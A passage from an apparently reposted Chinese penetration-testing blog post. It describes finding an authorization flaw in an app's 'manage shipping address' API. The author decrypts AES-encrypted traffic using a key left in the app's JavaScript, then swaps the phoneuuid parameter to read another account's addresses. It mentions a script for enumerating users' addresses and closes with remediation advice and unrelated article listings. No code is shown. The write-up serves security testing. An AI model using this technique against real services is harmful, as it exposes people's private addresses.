    5,经过反复查看流量的上下文,发现hook的流量是从另一个接口发出的,单独查看这几到这个接口的流量,发现这些流量是通过js加密的。。。。

    使用的加密方法以及秘钥,已经明明白白的写在了js文件里了。。。。

    6,按照js里写的加密方法,找了一个在线解密的网站,通过选择加密方法,填入秘钥,就可以解密出加密的数据。

    https://blog.zhengxianjun.com/html/tool_crypto_aes.html

    查看解密后的流量,其中一个phoneuuid得到了重点关注(关注的原因,只是因为经验所致,查越权,基本上都是重点关注这些涉及到id的参数)。

    7,使用这种方法,将这个接口交互的流量都进行了查看,发现“管理收货地址”这个接口,可以查看到我先前设置好的收货地址信息。

    8,修改提交参数,把phoneuuid改成另一个测试账号的id,发现可以查看到另一个账号的里设置的收货地址信息,坐实了此接口存在越权的漏洞。

    (请原谅这些厚厚的马赛克。。。因为这些地址,是同事家的真实地址)

    8,以上验证方法需要在3个不同的站点进行转发,效率太低了,就用Python按照js的加密方法,参考网上的代码,造了了一个轮子,可以输入明文或者密文,直接显示最终的结果。

    按照phoneuuid的格式,随机制造数据,使用这个脚本做加解密转换,就可以遍历其他人的收货地址信息。

    后记:

    与开发同事沟通,说此phoneuuid是由后端进行aes加密生成的,apk文件里也不包含此加密的key,但通过更改id,就能查看其它信息,这点的确是存在越权的问题。

    另外,还建议增加phoneuuid的长度,现在是16位的16进制字符串,但理论上,还是可以造足够大的数据来进行遍历。当然,如果权限那块做好的话,这个块应该就不存在问题了。

    -----------------------------------

    本文享受原创奖励 100 元。

    ------------------------------------

    ----------------------------------

    关注玄魂工作室--精彩不断

    个人年度总结及AWD线下赛复盘 拖了很久

    iOS冰与火之歌 – 利用XPC过App沙盒

    展开全文
  • 记一次渗透实战【转】

    千次阅读 2019-07-10 16:44:04
    记一次渗透实战【转】 信息收集 用dirsearch扫了一波目录没有发现什么东西 直接用主站域名解析的ip访问发现主站是挂有cdn的 subDomainsBrute 扫描子域名 其中一个子域没挂CDN,由此找到网站的真实ip 得到真实ip后...
  • 靶场测试--安鸾渗透实战平台

    千次阅读 2021-09-13 11:22:32
    CMS系列-Discuz ...文章目录CMS系列-Discuz前言一、利用Burp进行抓取数据包二、将数据包发送到Repeater1.构造请求参数验证漏洞是否存在2.利用Cookie信息上传Shell3.可以使用AntSword、Chopper或者Behinder进行连接,...
  • 树莓派渗透实战

    2018-05-21 17:19:58
    树莓派渗透实战,200MB的电子书
  • 内网渗透实战技巧

    2021-03-24 15:41:35
    主要以该环境讲解内网渗透的技术。 拓扑图如下: · Web服务器(Windows7):192.168.10.14 、192.168.52.143 主机名:stu1 · 域成员主机(Windows Server 2003):192.168.52.141 主机名:root-tvi862ubeh · ...
  • 开始渗透 此时面临的难处 过狗转折点 公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习 事件起因 从某个大佬手上获取到含有漏洞指纹信息的bc的cms。于是想尝试一波。通过指纹找一个站点。 PS:本文仅...
  • 网站渗透实战试验(仅供参考)

    千次阅读 2020-03-10 16:27:57
    sql注入的利用 已知绝对路径,且注入点为dba权限,在平时的大多数渗透中,就已经意味着getshell了。 然而,在这次渗透中,os-shell并没有执行成功。 经过多次尝试都以失败告终,猜测某种waf起了作用。 尝试使用...
  • 安鸾渗透实战平台——文件上传01 1、访问 2、找到上传点,全部都试了,就这里可以上传 3、准备木马,并把后缀改成.jpg,因为上传php时提示jpg,所以他应该做了过滤 4、我猜他是前端过滤,我这里抓个包,从数据包...
  • 渗透测试实战第三版 中文,慢慢干活全部环境都在书里。
  • 一次授权渗透实战

    千次阅读 2020-01-13 20:38:29
    很久没有整理实战文章了,恰好这周项目上有一个目标折腾了两天时间,记录分享下其中的心路历程(本次渗透过程均在目标授权下进行,请勿进行非法渗透行为)。 目标基本信息 某政务网站 服务器–windows 数据库–未知 ...
  • 目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) ...(三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
  • 实战案例仅作为技术分享,切勿在未经许可的任何公网站点实战。 ‘’‘ 昨天有个朋友问我能不能拿一个学校的站。 我说学校的一般做的挺好的,都是外包,加了waf,安全狗,360之类的。 他坚持让我试试,他说卡了很久...
  • 全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、社会工程学。
  • 本课程主要分享Kali Linux渗透攻防与安卓Android渗透测试实战技巧! 二、课程目标       1、掌握Kali Linux渗透攻防技巧       2、掌握安卓Android手机渗透技巧 三、适合人员   ...
  • 安鸾渗透实战平台|宽字符注入

    千次阅读 2021-12-17 20:13:25
    安鸾渗透实战平台|宽字符注入 一、渗透靶场地址 http://www.whalwl.work:8011 二、渗透实战 1.先使用1'进行测试,发现被斜杆转义 2.根据题目提示,直接上手宽字节注入,可以成功 ?id=1%df'--+ 3.测试or,and,==...
  • 第四步:Kali上打开metasploit进行渗透 具体操作过程为: msfconsole //开启测试框架 msf6 > use multi/handler //调用模块 [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/...
  • 针对物联网方面的渗透
  • 实战案例仅作为技术分享,切勿在未经许可的任何公网站点实战。 ’‘’ 前言:本次渗透交流的方法不是纯计算机网络的技术。而是一种巧解。其实大家都知道社会工程学很多时候就简单的理解为猜解。但是其意义远大于此...
  • 安鸾渗透实战平台wp(持续更新)

    千次阅读 2020-05-13 14:35:12
    一、SQL注入 SQL数字型GET注入01 ...1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # ... -1 union select 1,database(),3 # ...-1 union select 1,group_concat(table_name),3 ...
  • 先获取域内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由 ...
  • (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 11,800
精华内容 4,720
关键字:

渗透实战